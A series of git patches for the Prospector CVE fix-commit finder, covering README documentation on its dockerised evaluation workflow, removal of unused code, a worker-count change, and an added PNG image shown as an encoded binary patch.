self.references From 06cce6324792ef51a28c77830150ab35d1d41c2a Mon Sep 17 00:00:00 2001 From: I748376 Date: Wed, 14 Aug 2024 08:54:38 +0000 Subject: [PATCH 099/130] [DOC] updates readme --- prospector/evaluation/README.md | 30 +++++++++++++++++++++++++++--- 1 file changed, 27 insertions(+), 3 deletions(-) diff --git a/prospector/evaluation/README.md b/prospector/evaluation/README.md index 036b7ecc8..3aaaf5d27 100644 --- a/prospector/evaluation/README.md +++ b/prospector/evaluation/README.md @@ -22,6 +22,8 @@ b219fd6219ed adminer "entrypoint.sh php -…" 47 minutes ago them in a Redis Queue, from which the `prospector_worker` container fetches jobs and executes them. To visualise what is going on, run `docker attach prospector_worker_1` to see the usual console output. In order to change something inside the container, run `docker exec -it prospector_worker_1 bash` to open an interactive bash shell. +You can set the number of workers in `docker/worker/etc_supervisor_confd_rqworker.conf.j2`. + ## Command Line Options All scripts are called from `main.py`, depending on the CL flags that are set. The following flags can be set: @@ -30,7 +32,8 @@ All scripts are called from `main.py`, depending on the CL flags that are set. T 2. `-c`: Allows you to select a subset of CVEs, instead of all CVEs from the input data (eg. `-c CVE-2020-1925, CVE-2018-1234`) 3. `-e`: For *execute*, dispatched jobs for all CVEs from the input data (or the subset if `-c` is set) to the Redis Queue (`dispatch_jobs.py`). 4. `-a`: Analyses the reports created by Propsector (`analysis.py`) -5. `-s`: Analyses the statistics part of the Prospector reports (eg. to analyse execution times, `analyse_statistics.py`) +5. `-a -s`: Analyses the statistics part of the Prospector reports (eg. to analyse execution times, `analyse_statistics.py`) +6. `-a --flow`: Creates a JSON file showing how the reports change categories between two different executions. 6. `-eq`: For *empty queue*, to empty the jobs left on the queue. 7. `-co`: For *count*, to count how many of the CVEs in the input data have a corresponding report. @@ -40,10 +43,31 @@ The configuration file has two parts to it: a main part and a Prospector setting The main part at the top allows you to set the path to where the input data can be found, where Prospector reports should be saved to and where analysis results should be saved to. -The Prospector part allows you to set the settings for Prospector (independent from the Prospector settings used when running Prospector with `./run_prospector`). **Watch out**: Since the `prospector_worker` container is created in the beginning with the current state of the `config.yaml`, simply saving any changes in `config.yaml` and dispatching new jobs will still run them with the old configuration. For new configuration parameters to take effect, either destroy the containers with `make docker-clean` and rebuild them with `make docker-setup` or open an interactive shell to the container and make your changes to `config.yaml` in there. +The Prospector part allows you to set the settings for Prospector (independent from the Prospector settings used when running Prospector with `./run_prospector`). **Watch out**: Since the `prospector_worker` container is created in the beginning with the current state of the `config.yaml`, simply saving any changes in `config.yaml` and dispatching new jobs will still run them with the old configuration. For new configuration parameters to take effect, either destroy the containers with `make docker-clean` and rebuild them with `make docker-setup` or open an interactive shell to the container and make your changes to the code in there. ## Script Files explained ### Running Prospector on multiple CVEs (`dispatch_jobs.py`) -The code for running Prospector is in `dispatch_jobs.py`. It exctracts CVE IDs from the data given in the path constructed as: `input_data_path` + the `-i` CL parameter. It then dispatches a job for each CVE ID to the queue, from where these jobs get executed. \ No newline at end of file +The code for running Prospector is in `dispatch_jobs.py`. It exctracts CVE IDs from the data given in the path constructed as: `input_data_path` + the `-i` CL parameter. It then dispatches a job for each CVE ID to the queue, from where these jobs get executed. The path to the input file is split into two components (`input_data_path` in `config.yaml` and the `-i` parameter) because you might have one folder in which you have several different input data files of the same format. This keeps you from typing the full path, but still allows you to switch between the files between different runs. + +The reports are generated in the worker container, and saved to `prospector_reports_path_container`. This folder is mounted into the container, so you can see any newly generated reports in the same folder on the host. + +Do not confuse this paramter with `prospector_reports_path_host`, which sets the path to a batch of reports on the host (used for analysis). Your workflow should be as follows: + +1. Dispatch reports +2. When the report generation has finished, move the reports to any other folder (preferably outside of the `prospector/` folder to keep the build context for the container from getting too big). +3. Analyse the reports by setting the `prospector_reports_path_host` to the folder where you moved the reports to. + +### Analysing the generated reports (`analyse.py`) + +Start an analysis with + +```bash +python3 evaluation/main.py -i -a +``` + +This will start the `analyse_prospector_reports()` function in `analyse.py`, which re-creates the summary execution table from [AssureMOSS D6.3](https://assuremoss.eu/en/resources/Deliverables/D6.3): +![D6.3 Summary Execution Table](images/summary_execution_table.png) + +It also creates a detailed JSON file (listing CVEs in each category) in `data/results/summary_execution/` to inspect which CVEs are in which category. \ No newline at end of file From 58ff0729794b91c8dec6557fcc19315cd6aa503b Mon Sep 17 00:00:00 2001 From: I748376 Date: Wed, 14 Aug 2024 08:56:12 +0000 Subject: [PATCH 100/130] [DOC] removes unused code --- prospector/evaluation/dispatch_jobs.py | 8 +------- 1 file changed, 1 insertion(+), 7 deletions(-) diff --git a/prospector/evaluation/dispatch_jobs.py b/prospector/evaluation/dispatch_jobs.py index b2d0f1d66..780a73331 100644 --- a/prospector/evaluation/dispatch_jobs.py +++ b/prospector/evaluation/dispatch_jobs.py @@ -19,17 +19,11 @@ prospector_config = config.prospector_settings -def to_latex_table(): - data = load_dataset("results/scalco.csv") - for e in data: - print(f"{e[0]} & {e[1][19:]} & {e[5]} \\\\ \hline") # noqa: W605 - - def dispatch_prospector_jobs(filename: str, selected_cves: str): """Dispatches jobs to the queue.""" dataset = load_dataset(INPUT_DATA_PATH + filename + ".csv") - # dataset = dataset[100:200] + dataset = dataset[200:300] # done 0-100, # Only run a subset of CVEs if the user supplied a selected set if len(selected_cves) != 0: From f57080e832f36a345d916c90b9d7c673f06c37a1 Mon Sep 17 00:00:00 2001 From: I748376 Date: Wed, 14 Aug 2024 08:59:33 +0000 Subject: [PATCH 101/130] [FIX] uses 20 instead of 2 workers --- .../docker/worker/etc_supervisor_confd_rqworker.conf.j2 | 2 +- prospector/git/raw_commit.py | 4 +++- 2 files changed, 4 insertions(+), 2 deletions(-) diff --git a/prospector/docker/worker/etc_supervisor_confd_rqworker.conf.j2 b/prospector/docker/worker/etc_supervisor_confd_rqworker.conf.j2 index 64e60b2ea..7cb8b24e8 100644 --- a/prospector/docker/worker/etc_supervisor_confd_rqworker.conf.j2 +++ b/prospector/docker/worker/etc_supervisor_confd_rqworker.conf.j2 @@ -8,7 +8,7 @@ command=/usr/local/bin/python3 /usr/local/bin/rq worker {{env['RQ_QUEUE']}} -u r process_name=%(program_name)s%(process_num)01d ; If you want to run more than one worker instance, increase this -numprocs=2 +numprocs=20 redirect_stderr=true ; This is the directory from which RQ is ran. Be sure to point this to the diff --git a/prospector/git/raw_commit.py b/prospector/git/raw_commit.py index 26d50eb18..e23103192 100644 --- a/prospector/git/raw_commit.py +++ b/prospector/git/raw_commit.py @@ -76,7 +76,9 @@ def get_diff(self) -> Tuple[List[str], int]: return "", 0 try: # We already filtered out in Git the "useless files, so we can exclude them from the diff also. Reduces false positives rules." - cmd = f"git diff --unified=1 {self.id}^! -- " + " ".join(self.changed_files) + cmd = f"git diff --unified=1 {self.id}^! -- " + " ".join( + self.changed_files + ) diffs = self.execute(cmd) return diffs, self.get_hunks_count(diffs) From 49301b3f6dd2922bfbb28878a4bea58af539c061 Mon Sep 17 00:00:00 2001 From: I748376 Date: Wed, 14 Aug 2024 09:00:00 +0000 Subject: [PATCH 102/130] [DOC] adds images for readme --- .../images/summary_execution_table.png | Bin 0 -> 71830 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 prospector/evaluation/images/summary_execution_table.png diff --git a/prospector/evaluation/images/summary_execution_table.png b/prospector/evaluation/images/summary_execution_table.png new file mode 100644 index 0000000000000000000000000000000000000000..55ba10679bb03e34901933e210cfd1a6297591ac GIT binary patch literal 71830 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 